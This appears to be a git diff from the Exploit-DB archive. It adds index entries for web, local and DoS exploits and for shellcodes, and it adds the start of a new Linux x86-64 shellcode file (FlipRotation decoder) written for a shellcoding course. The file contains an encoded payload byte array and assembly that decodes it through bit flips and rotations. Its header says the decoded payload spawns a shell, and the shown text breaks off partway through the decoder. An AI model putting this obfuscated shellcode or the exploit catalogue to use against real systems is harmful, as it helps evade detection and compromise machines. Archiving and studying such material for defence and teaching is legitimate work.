41676,exploits/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,webapps,linux,,2017-03-23,2017-03-23,1,CVE-2014-3829;CVE-2014-3828,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/linux/http/centreon_sqli_exec.rb
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,,2018-08-14,2018-08-14,0,CVE-2018-14912,"Metasploit Framework (MSF)",,,,
@ -11449,6 +11457,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,,
44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",2021-09-06,Vulnz,webapps,multiple,,2021-09-06,2021-09-06,0,,,,,http://www.exploit-db.comantminer-monitor-0.5.0.zip,
51193,exploits/multiple/webapps/51193.py,"Apache 2.4.x - Buffer Overflow",2023-04-01,"Sunil Iyengar",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2021-44790,,,,,
49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,,
15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,,
@ -11930,6 +11939,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,,
33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info
50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,,
51186,exploits/multiple/webapps/51186.txt,"perfSONAR v4.4.5 - Partial Blind CSRF",2023-04-01,"Ryan Moore",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2022-41413,,,,,
49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28092,,,,,
46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,,2019-02-04,2019-02-05,0,,"Cross-Site Scripting (XSS)",,,,
47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,,2019-10-01,2020-02-14,0,,,,,,https://github.com/mm0r1/exploits/blob/70835936612bceb93b268d1e9f761b84496610ed/php-json-bypass/exploit.php
@ -29872,6 +29882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1785,exploits/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,webapps,php,,2006-05-13,2017-11-22,1,OSVDB-25532;CVE-2006-2460,,,,,
24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1225;OSVDB-12229;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50
24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1227;OSVDB-12230;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50
51187,exploits/php/webapps/51187.py,"SugarCRM 12.2.0 - Remote Code Execution (RCE)",2023-04-01,sw33t.0day,webapps,php,,2023-04-01,2023-04-01,0,,,,,,
43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5715,,,,http://www.exploit-db.comSugarSuite-3.5.1.zip,
8949,exploits/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,webapps,php,,2009-06-14,,1,CVE-2009-2146;OSVDB-55089,,,,,http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
35467,exploits/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",webapps,php,,2011-03-15,2014-12-05,1,CVE-2011-0745;OSVDB-74888,,,,,https://www.securityfocus.com/bid/46885/info
@ -33598,6 +33609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30603,exploits/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,webapps,php,,2007-09-22,2013-12-31,1,CVE-2007-5060;OSVDB-40584,,,,,https://www.securityfocus.com/bid/25771/info
4802,exploits/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,webapps,php,,2007-12-27,,1,OSVDB-40276;CVE-2007-6604,,,,,
4813,exploits/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,webapps,php,,2007-12-29,,1,OSVDB-40277;CVE-2007-6652,,,,,
51184,exploits/php/webapps/51184.txt,"XCMS v1.83 - Remote Command Execution (RCE)",2023-04-01,Onurcan,webapps,php,,2023-04-01,2023-04-01,0,,,,,,
27797,exploits/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,webapps,php,,2006-05-02,2013-08-23,1,,,,,,https://www.securityfocus.com/bid/17781/info
36949,exploits/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php,5272,2015-05-08,2015-05-08,0,CVE-2015-3141;OSVDB-121847,,,,,
1459,exploits/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,webapps,php,,2006-01-29,2016-06-21,1,,,,,http://www.exploit-db.comxeCMS-RC2.7z,
@ -33852,6 +33864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,webapps,php,,2009-02-15,2017-02-13,1,OSVDB-52041,,,,,
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,,2018-04-09,2018-04-09,0,CVE-2018-9238,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comtz_e.zip,
7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,webapps,php,,2008-11-15,2017-01-02,1,OSVDB-49906;CVE-2008-5490,,,,,
51198,exploits/php/webapps/51198.txt,"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)",2023-04-01,"SITE Team",webapps,php,,2023-04-01,2023-04-01,0,CVE-2022-48197,,,,,
13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,webapps,php,,2010-06-11,2016-10-27,0,CVE-2010-2336;CVE-2010-2335;CVE-2010-2334;CVE-2010-1300;OSVDB-65648;OSVDB-65479;OSVDB-63344,,,,http://www.exploit-db.comyamamah_v1.rar,
13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,webapps,php,,2010-06-11,,1,CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar,
11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php,,2010-03-29,,0,OSVDB-63344;CVE-2010-2335;CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar,
@ -34274,6 +34287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",2022-04-26,Greenwolf,webapps,ruby,,2022-04-26,2022-05-11,0,CVE-2022-1175,,,,,
49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-04-01,0,CVE-2022-2884,,,,,
42961,exploits/ruby/webapps/42961.txt,"Metasploit Web UI < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,,2017-10-08,2020-08-22,1,CVE-2017-15084,,,,,
39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443,2016-04-25,2016-04-25,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php
39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80,2016-06-21,2016-06-21,0,,,,,http://www.exploit-db.comradiant-1.1.3.tar.gz,
@ -35065,6 +35079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28232,exploits/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",dos,windows,,2006-07-17,2013-09-12,1,CVE-2006-3696;OSVDB-27353,,,,,https://www.securityfocus.com/bid/19026/info
11260,exploits/windows/dos/11260.py,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,dos,windows,,2010-01-25,,1,,,,,http://www.exploit-db.comSetup_AICAudioPlayer.exe,
3034,exploits/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,dos,windows,,2006-12-27,,1,OSVDB-32537;CVE-2006-6855,,,,,
51196,exploits/windows/dos/51196.txt,"AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)",2023-04-01,nu11secur1ty,dos,windows,,2023-04-01,2023-04-01,0,,,,,,
8837,exploits/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,dos,windows,,2009-05-31,,1,OSVDB-54812;CVE-2009-1944,,2009-aimp2_evil.mp3,,,
33640,exploits/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,dos,windows,,2010-02-12,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38215/info
9561,exploits/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,dos,windows,,2009-08-31,,1,OSVDB-58125;CVE-2009-3170,,,,http://www.exploit-db.comaimp_2.51.330.zip,
@ -40541,6 +40556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40539,exploits/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comrc-setup.exe,
40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,,2016-09-30,2016-10-03,0,,,,,http://www.exploit-db.comNETGEARGenie-install.exe,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",2021-10-25,"Mert Daş",local,windows,,2021-10-25,2021-10-25,0,,,,,,
51199,exploits/windows/local/51199.c,"NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit",2023-04-01,"Neil Kettle",local,windows,,2023-04-01,2023-04-01,0,,,,,,
17223,exploits/windows/local/17223.pl,"NetOp Remote Control 8.0/9.1/9.2/9.5 - Local Buffer Overflow",2011-04-28,chap0,local,windows,,2011-04-28,2011-04-29,1,OSVDB-72291,,,,,
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,,2020-07-22,2020-07-22,0,,,,,,
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,,2019-03-11,2019-03-11,0,,,,,http://www.exploit-db.comnetsetman_setup_471.exe,
@ -40953,6 +40969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,
49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,
30681,exploits/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Local Privilege Escalation",2007-10-18,"Ruben Santamarta",local,windows,,2007-10-18,2014-01-06,1,CVE-2007-5633;OSVDB-41842,,,,,https://www.securityfocus.com/bid/26123/info
51182,exploits/windows/local/51182.txt,"Splashtop 8.71.12001.0 - Unquoted Service Path",2023-04-01,"A.I. hernandez",local,windows,,2023-04-01,2023-04-01,0,,,,,,
45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,,2018-07-23,2018-07-23,0,,,,,http://www.exploit-db.comssproeval512.exe,
45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,,2018-07-23,2018-08-08,1,,,,,http://www.exploit-db.comssproeval512.exe,
17306,exploits/windows/local/17306.pl,"SpongeBob SquarePants Typing - Local Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",local,windows,,2011-05-18,2011-05-18,1,,,,http://www.exploit-db.com/screenshots/idlt17500/untitled.png,,
@ -45209,6 +45226,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,,2018-06-18,2018-06-19,0,,Traversal,,,,
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80,2014-10-02,2014-10-02,0,CVE-2014-7226;OSVDB-112626,,,,http://www.exploit-db.comhfs2.3c.src.zip,
49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,,2020-11-30,2020-11-30,0,CVE-2014-6287,,,,,
51188,exploits/windows/webapps/51188.txt,"Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)",2023-04-01,"Mohammed A.Siledar",webapps,windows,,2023-04-01,2023-04-01,0,CVE-2022-30519,,,,,
44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,,2018-05-16,2018-05-16,0,CVE-2016-2279,,,,,
33428,exploits/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",webapps,windows,7002,2014-05-19,2014-05-27,1,CVE-2007-6483;OSVDB-42402,,,http://www.exploit-db.com/screenshots/idlt33500/screen-shot-2014-05-27-at-91059-am.png,http://www.exploit-db.comSentinel_Protection_Installer_7.4.0.exe,
16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",webapps,windows,,2011-01-26,2011-01-26,0,,,,,,

Can't render this file because it is too large.

3
files_shellcodes.csv
View file

@ -180,6 +180,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,,irix,,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-141.php
43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,,irix,68,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-140.php
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,,irix,40,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-137.php
51191,shellcodes/linux/51191.txt,"FlipRotation v1.0 decoder - Shellcode (146 bytes)",2023-04-01,"Eduardo Silva",,linux,146,2023-04-01,2023-04-01,0,,,,,,
41375,shellcodes/linux/41375.c,"Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,,linux,156,2017-02-16,2017-07-11,0,,,,,,
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,,linux,37,2017-01-29,2017-07-11,0,,,,,,
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,,linux,62,2010-07-05,2010-07-05,1,,,,,,
@ -569,6 +570,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,,linux_x86,185,2019-05-03,2019-05-23,0,,,,,,
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,,linux_x86,43,2010-01-14,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-565.php
13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,,linux_x86,99,2009-03-02,2017-07-11,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-74.php
51189,shellcodes/linux_x86/51189.txt,"Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)",2023-04-01,"Eduardo Silva",,linux_x86,92,2023-04-01,2023-04-01,0,,,,,,
13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,,linux_x86,56,2008-11-17,2017-08-23,1,,,"Ho\' Detector",,,
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,,linux_x86,83,2010-05-26,2018-01-17,1,,,,,,
43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,,linux_x86,89,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-610.php
@ -831,6 +833,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,,
46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,,
46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,,
51178,shellcodes/macos/51178.txt,"macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode",2023-04-01,boku,,macos,286,2023-04-01,2023-04-01,0,,,,,,
51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,,
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,,
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
180 43509 shellcodes/irix/43509.c IRIX - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 anonymous irix 2018-01-11 2018-01-11 0 http://shell-storm.org/shellcode/files/shellcode-141.php
181 43511 shellcodes/irix/43511.c IRIX - execve(/bin/sh) Shellcode (68 bytes) 2009-01-01 scut/teso irix 68 2018-01-11 2018-01-11 0 http://shell-storm.org/shellcode/files/shellcode-140.php
182 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso irix 40 2018-01-11 2018-01-11 0 http://shell-storm.org/shellcode/files/shellcode-137.php
183 51191 shellcodes/linux/51191.txt FlipRotation v1.0 decoder - Shellcode (146 bytes) 2023-04-01 Eduardo Silva linux 146 2023-04-01 2023-04-01 0
184 41375 shellcodes/linux/41375.c Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode linux 156 2017-02-16 2017-07-11 0
185 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode linux 37 2017-01-29 2017-07-11 0
186 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ linux 62 2010-07-05 2010-07-05 1
570 46791 shellcodes/linux_x86/46791.c Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes) 2019-05-03 strider linux_x86 185 2019-05-03 2019-05-23 0
571 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson linux_x86 43 2010-01-14 2018-01-09 1 http://shell-storm.org/shellcode/files/shellcode-565.php
572 13323 shellcodes/linux_x86/13323.c Linux/x86 - Perl Script Execution Shellcode (99+ bytes) 2009-03-03 darkjoker linux_x86 99 2009-03-02 2017-07-11 1 http://shell-storm.org/shellcode/files/shellcode-74.php
573 51189 shellcodes/linux_x86/51189.txt Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes) 2023-04-01 Eduardo Silva linux_x86 92 2023-04-01 2023-04-01 0
574 13332 shellcodes/linux_x86/13332.c Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) 2008-11-18 XenoMuta linux_x86 56 2008-11-17 2017-08-23 1 Ho\' Detector
575 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix linux_x86 83 2010-05-26 2018-01-17 1
576 43684 shellcodes/linux_x86/43684.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes) 2009-01-01 agix linux_x86 89 2018-01-17 2018-01-17 0 http://shell-storm.org/shellcode/files/shellcode-610.php
833 46397 shellcodes/macos/46397.c Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara macos 31 2019-02-18 2019-05-23 0
834 46395 shellcodes/macos/46395.c Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2019-02-18 Ken Kitahara macos 103 2019-02-18 2019-02-18 0
835 46393 shellcodes/macos/46393.c Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes) 2019-02-18 Ken Kitahara macos 119 2019-02-18 2019-05-23 0
836 51178 shellcodes/macos/51178.txt macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode 2023-04-01 boku macos 286 2023-04-01 2023-04-01 0
837 51177 shellcodes/macos/51177.txt macOS/x64 - Execve Null-Free Shellcode 2023-03-31 boku macos 253 2023-03-31 2023-03-31 0
838 39885 shellcodes/multiple/39885.c BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator) 2016-06-06 odzhancode multiple 194 2016-06-16 2018-01-21 1 http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png
839 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) 2004-09-12 dymitri multiple 38 2004-09-11 1

106
shellcodes/linux/51191.txt Normal file
View file

@ -0,0 +1,106 @@
## Exploit Title: FlipRotation v1.0 decoder - Shellcode (146 bytes)
## Exploit Author: Eduardo Silva
## Date: 2022-12-31
## Tested on: Linux x86_64 SMP Debian 4.19.260-1
## SLAE/Student ID: PA-31319
## Webpage: https://0xnibbles.github.io/
## Twitter: @0xnibbles
## Course: This shellcode was created for the x86 Assembly Language and Shellcoding on Linux (SLAE32) Course offered at pentesteracademy.com.
## Description: The inspiration for this algorithm was the known CBC bit-flipping attack but applying a simple variation to our context.
##
## More specifically, the steps are
##
## 1 - We pick each shelcode byte and flip the last bit using a xor operation - flipped_shellbyte = shellbyte ^ 0x01
## 2 - Based on that output the rotation direction is defined. We rotate right if odd or left if even. The number of rotation positions is defined by the loop index value (number of interations) of the loop at that time.
## 3 - If we rotate right we append 0x2 afther the encoded byte and if we rotate left we append 0xff
## 4 - Put the byte 0xa0 as the shellcode end marker
##
## More info at https://0xnibbles.github.io/posts/slae_32_assignment_4/ - the 64 bit version has the same logic as 32 bit
##
## Example:
## $ ./shellcode
## Shellcode Length: 146
## id
## uid=1000 ...
##
########################################################################
global _start
section .text
_start:
jmp decoder
EncodedShellcode: db 0x49,0xff,0x18,0x02,0x7,0xff,0x8a,0xff,0x94,0xff,0xd5,0x02,0xb8,0x02,0xb1,0xff,0x68,0x02,0xde,0xff,0x8b,0x02,0xc5,0x02,0x27,0x02,0x2d,0xff,0x49,0x02,0xa4,0xff,0x88,0x02,0x73,0x02,0x45,0xff,0x4a,0xff,0x88,0x02,0x7c,0xff,0x59,0x02,0xa4,0xff,0x88,0x02,0xcf,0xff,0x25,0xff,0x50,0x02,0x1c,0xff,0xd1,0x02,0x38,0x02,0x8,0x02,0xa0,0xa0 ; 0xa0 is the stop marker
decoder:
lea rsi, [rel EncodedShellcode]
lea rdi, [rsi+1] ; pointing to second byte (0x02) from shellcode
xor rax, rax
mul rax ; zeroes edx
mov al, 1
xor rcx, rcx
xor rbx, rbx
decode:
mov bl, byte [rsi + rax] ; mov parity byte to bl
xor bl, 0xa0 ; check if reached the end marker | 0xa0 ^ 0xff = 0x5f
jz short EncodedShellcode ; reached the marker if Zero Flag not set
xor bl, 0x5f ; if equal parity is even (0xff)
mov bl, byte [rsi + rdx]
jnz odd
even: ; rotate right
ror bl, cl
jmp short bitFlip
